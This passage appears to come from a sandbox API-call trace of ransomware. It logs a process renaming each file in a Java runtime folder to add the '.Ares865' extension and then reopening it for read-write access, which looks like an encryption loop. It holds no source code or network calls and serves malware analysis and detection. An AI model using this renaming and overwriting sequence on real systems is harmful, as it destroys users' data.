(x86)\\Java\\jre7\\bin\\jpinscp.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpinscp.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.347] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=103848) returned 1 [0138.356] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jpioji.dll" | out: lpString1="jpioji.dll") returned="jpioji.dll" [0138.356] lstrlenW (lpString="jpioji.dll") returned 10 [0138.356] lstrlenW (lpString="Ares865") returned 7 [0138.356] lstrcmpiW (lpString1="oji.dll", lpString2="Ares865") returned 1 [0138.356] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\jpioji.dll.Ares865") returned 55 [0138.356] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jpioji.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpioji.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jpioji.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpioji.dll.ares865"), dwFlags=0x1) returned 1 [0138.359] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jpioji.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpioji.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.359] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=69032) returned 1 [0138.365] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jpishare.dll" | out: lpString1="jpishare.dll") returned="jpishare.dll" [0138.365] lstrlenW (lpString="jpishare.dll") returned 12 [0138.365] lstrlenW (lpString="Ares865") returned 7 [0138.365] lstrcmpiW (lpString1="are.dll", lpString2="Ares865") returned -1 [0138.365] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\jpishare.dll.Ares865") returned 57 [0138.365] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jpishare.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpishare.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jpishare.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpishare.dll.ares865"), dwFlags=0x1) returned 1 [0138.367] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jpishare.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpishare.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.367] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=141736) returned 1 [0138.377] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jqs.exe" | out: lpString1="jqs.exe") returned="jqs.exe" [0138.377] lstrlenW (lpString="jqs.exe") returned 7 [0138.377] lstrlenW (lpString="Ares865") returned 7 [0138.378] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\jqs.exe.Ares865") returned 52 [0138.378] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jqs.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jqs.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jqs.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jqs.exe.ares865"), dwFlags=0x1) returned 1 [0138.380] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jqs.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jqs.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.380] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=182696) returned 1 [0138.391] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jsdt.dll" | out: lpString1="jsdt.dll") returned="jsdt.dll" [0138.392] lstrlenW (lpString="jsdt.dll") returned 8 [0138.392] lstrlenW (lpString="Ares865") returned 7 [0138.392] lstrcmpiW (lpString1="sdt.dll", lpString2="Ares865") returned 1 [0138.392] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\jsdt.dll.Ares865") returned 53 [0138.392] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jsdt.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jsdt.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jsdt.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jsdt.dll.ares865"), dwFlags=0x1) returned 1 [0138.393] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jsdt.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jsdt.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.394] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16808) returned 1 [0138.397] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jsound.dll" | out: lpString1="jsound.dll") returned="jsound.dll" [0138.397] lstrlenW (lpString="jsound.dll") returned 10 [0138.397] lstrlenW (lpString="Ares865") returned 7 [0138.397] lstrcmpiW (lpString1="und.dll", lpString2="Ares865") returned 1 [0138.397] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\jsound.dll.Ares865") returned 55 [0138.397] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jsound.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jsound.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jsound.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jsound.dll.ares865"), dwFlags=0x1) returned 1 [0138.400] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jsound.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jsound.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.401] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=30632) returned 1 [0138.404] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jsoundds.dll" | out: lpString1="jsoundds.dll") returned="jsoundds.dll" [0138.405] lstrlenW (lpString="jsoundds.dll") returned 12 [0138.405] lstrlenW (lpString="Ares865") returned 7 [0138.405] lstrcmpiW (lpString1="dds.dll", lpString2="Ares865") returned 1 [0138.405] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\jsoundds.dll.Ares865") returned 57 [0138.405] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jsoundds.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jsoundds.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jsoundds.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jsoundds.dll.ares865"), dwFlags=0x1) returned 1 [0138.406] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jsoundds.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jsoundds.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.406] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27560) returned 1 [0138.410] lstrcpyW (in: lpString1=0x2cce44a, lpString2="kcms.dll" | out: lpString1="kcms.dll") returned="kcms.dll" [0138.410] lstrlenW (lpString="kcms.dll") returned 8 [0138.411] lstrlenW (lpString="Ares865") returned 7 [0138.411] lstrcmpiW (lpString1="cms.dll", lpString2="Ares865") returned 1 [0138.411] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\kcms.dll.Ares865") returned 53 [0138.411] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\kcms.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\kcms.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\kcms.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\kcms.dll.ares865"), dwFlags=0x1) returned 1 [0138.412] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\kcms.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\kcms.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.412] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=178088) returned 1 [0138.424] lstrcpyW (in: lpString1=0x2cce44a, lpString2="keytool.exe" | out: lpString1="keytool.exe") returned="keytool.exe" [0138.425] lstrlenW (lpString="keytool.exe") returned 11 [0138.425] lstrlenW (lpString="Ares865") returned 7 [0138.425] lstrcmpiW (lpString1="ool.exe", lpString2="Ares865") returned 1 [0138.425] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\keytool.exe.Ares865") returned 56 [0138.425] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\keytool.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\keytool.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\keytool.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\keytool.exe.ares865"), dwFlags=0x1) returned 1 [0138.427] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\keytool.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\keytool.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.427] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15784) returned 1 [0138.431] lstrcpyW (in: lpString1=0x2cce44a, lpString2="kinit.exe" | out: lpString1="kinit.exe") returned="kinit.exe" [0138.431] lstrlenW (lpString="kinit.exe") returned 9 [0138.431] lstrlenW (lpString="Ares865") returned 7 [0138.431] lstrcmpiW (lpString1="nit.exe", lpString2="Ares865") returned 1 [0138.431] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\kinit.exe.Ares865") returned 54 [0138.431] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\kinit.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\kinit.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\kinit.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\kinit.exe.ares865"), dwFlags=0x1) returned 1 [0138.433] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\kinit.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\kinit.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.433] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15784) returned 1 [0138.436] lstrcpyW (in: lpString1=0x2cce44a, lpString2="klist.exe" | out: lpString1="klist.exe") returned="klist.exe" [0138.436] lstrlenW (lpString="klist.exe") returned 9 [0138.436] lstrlenW (lpString="Ares865") returned 7 [0138.436] lstrcmpiW (lpString1="ist.exe", lpString2="Ares865") returned 1 [0138.437] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\klist.exe.Ares865") returned 54 [0138.437] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\klist.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\klist.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\klist.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\klist.exe.ares865"), dwFlags=0x1) returned 1 [0138.438] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\klist.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\klist.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.438] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15784) returned 1 [0138.442] lstrcpyW (in: lpString1=0x2cce44a, lpString2="ktab.exe" | out: lpString1="ktab.exe") returned="ktab.exe" [0138.442] lstrlenW (lpString="ktab.exe") returned 8 [0138.442] lstrlenW (lpString="Ares865") returned 7 [0138.442] lstrcmpiW (lpString1="tab.exe", lpString2="Ares865") returned 1 [0138.442] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\ktab.exe.Ares865") returned 53 [0138.442] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\ktab.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\ktab.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\ktab.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\ktab.exe.ares865"), dwFlags=0x1) returned 1 [0138.444] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\ktab.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\ktab.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.444] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15784) returned 1 [0138.447] lstrcpyW (in: lpString1=0x2cce44a, lpString2="libxml2.dll" | out: lpString1="libxml2.dll") returned="libxml2.dll" [0138.447] lstrlenW (lpString="libxml2.dll") returned 11 [0138.447] lstrlenW (lpString="Ares865") returned 7 [0138.447] lstrcmpiW (lpString1="ml2.dll", lpString2="Ares865") returned 1 [0138.448] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\libxml2.dll.Ares865") returned 56 [0138.448] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\libxml2.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\libxml2.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\libxml2.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\libxml2.dll.ares865"), dwFlags=0x1) returned 1 [0138.450] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\libxml2.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\libxml2.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.450] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=449448) returned 1 [0138.477] lstrcpyW (in: lpString1=0x2cce44a, lpString2="libxslt.dll" | out: lpString1="libxslt.dll") returned="libxslt.dll" [0138.477] lstrlenW (lpString="libxslt.dll") returned 11 [0138.478] lstrlenW (lpString="Ares865") returned 7 [0138.478] lstrcmpiW (lpString1="slt.dll", lpString2="Ares865") returned 1 [0138.478] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\libxslt.dll.Ares865") returned 56 [0138.478] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\libxslt.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\libxslt.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\libxslt.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\libxslt.dll.ares865"), dwFlags=0x1) returned 1 [0138.480] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\libxslt.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\libxslt.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.480] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=158120) returned 1 [0138.491] lstrcpyW (in: lpString1=0x2cce44a, lpString2="management.dll" | out: lpString1="management.dll") returned="management.dll" [0138.491] lstrlenW (lpString="management.dll") returned 14 [0138.491] lstrlenW (lpString="Ares865") returned 7 [0138.491] lstrcmpiW (lpString1="ent.dll", lpString2="Ares865") returned 1 [0138.492] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\management.dll.Ares865") returned 59 [0138.492] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\management.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\management.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\management.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\management.dll.ares865"), dwFlags=0x1) returned 1 [0138.493] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\management.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\management.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.493] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=31656) returned 1 [0138.497] lstrcpyW (in: lpString1=0x2cce44a, lpString2="mlib_image.dll" | out: lpString1="mlib_image.dll") returned="mlib_image.dll" [0138.497] lstrlenW (lpString="mlib_image.dll") returned 14 [0138.497] lstrlenW (lpString="Ares865") returned 7 [0138.497] lstrcmpiW (lpString1="age.dll", lpString2="Ares865") returned -1 [0138.498] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\mlib_image.dll.Ares865") returned 59 [0138.498] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\mlib_image.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\mlib_image.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\mlib_image.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\mlib_image.dll.ares865"), dwFlags=0x1) returned 1 [0138.500] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\mlib_image.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\mlib_image.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.500] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=573864) returned 1 [0138.543] lstrcpyW (in: lpString1=0x2cce44a, lpString2="msvcr100.dll" | out: lpString1="msvcr100.dll") returned="msvcr100.dll" [0138.543] lstrlenW (lpString="msvcr100.dll") returned 12 [0138.543] lstrlenW (lpString="Ares865") returned 7 [0138.543] lstrcmpiW (lpString1="100.dll", lpString2="Ares865") returned -1 [0138.543] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\msvcr100.dll.Ares865") returned 57 [0138.543] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\msvcr100.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\msvcr100.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\msvcr100.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\msvcr100.dll.ares865"), dwFlags=0x1) returned 1 [0138.545] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\msvcr100.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\msvcr100.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.545] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=773968) returned 1 [0138.658] lstrcpyW (in: lpString1=0x2cce44a, lpString2="net.dll" | out: lpString1="net.dll") returned="net.dll" [0138.658] lstrlenW (lpString="net.dll") returned 7 [0138.658] lstrlenW (lpString="Ares865") returned 7 [0138.658] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\net.dll.Ares865") returned 52 [0138.658] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\net.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\net.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\net.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\net.dll.ares865"), dwFlags=0x1) returned 1 [0138.661] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\net.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\net.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.661] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=75688) returned 1 [0138.675] lstrcpyW (in: lpString1=0x2cce44a, lpString2="nio.dll" | out: lpString1="nio.dll") returned="nio.dll" [0138.675] lstrlenW (lpString="nio.dll") returned 7 [0138.675] lstrlenW (lpString="Ares865") returned 7 [0138.675] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\nio.dll.Ares865") returned 52 [0138.676] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\nio.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\nio.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\nio.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\nio.dll.ares865"), dwFlags=0x1) returned 1 [0138.677] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\nio.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\nio.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.677] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=50088) returned 1 [0138.685] lstrcpyW (in: lpString1=0x2cce44a, lpString2="npjpi170_45.dll" | out: lpString1="npjpi170_45.dll") returned="npjpi170_45.dll" [0138.685] lstrlenW (lpString="npjpi170_45.dll") returned 15 [0138.685] lstrlenW (lpString="Ares865") returned 7 [0138.685] lstrcmpiW (lpString1="_45.dll", lpString2="Ares865") returned -1 [0138.686] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\npjpi170_45.dll.Ares865") returned 60 [0138.686] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\npjpi170_45.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\npjpi170_45.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\npjpi170_45.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\npjpi170_45.dll.ares865"), dwFlags=0x1) returned 1 [0138.693] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\npjpi170_45.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\npjpi170_45.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.693] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=223144) returned 1 [0138.722] lstrcpyW (in: lpString1=0x2cce44a, lpString2="npoji610.dll" | out: lpString1="npoji610.dll") returned="npoji610.dll" [0138.722] lstrlenW (lpString="npoji610.dll") returned 12 [0138.722] lstrlenW (lpString="Ares865") returned 7 [0138.722] lstrcmpiW (lpString1="610.dll", lpString2="Ares865") returned -1 [0138.722] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\npoji610.dll.Ares865") returned 57 [0138.722] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\npoji610.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\npoji610.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\npoji610.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\npoji610.dll.ares865"), dwFlags=0x1) returned 1 [0138.724] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\npoji610.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\npoji610.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.725] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=220584) returned 1 [0138.757] lstrcpyW (in: lpString1=0x2cce44a, lpString2="npt.dll" | out: lpString1="npt.dll") returned="npt.dll" [0138.757] lstrlenW (lpString="npt.dll") returned 7 [0138.757] lstrlenW (lpString="Ares865") returned 7 [0138.757] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\npt.dll.Ares865") returned 52 [0138.757] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\npt.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\npt.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\npt.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\npt.dll.ares865"), dwFlags=0x1) returned 1 [0138.759] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\npt.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\npt.dll.ares865"), 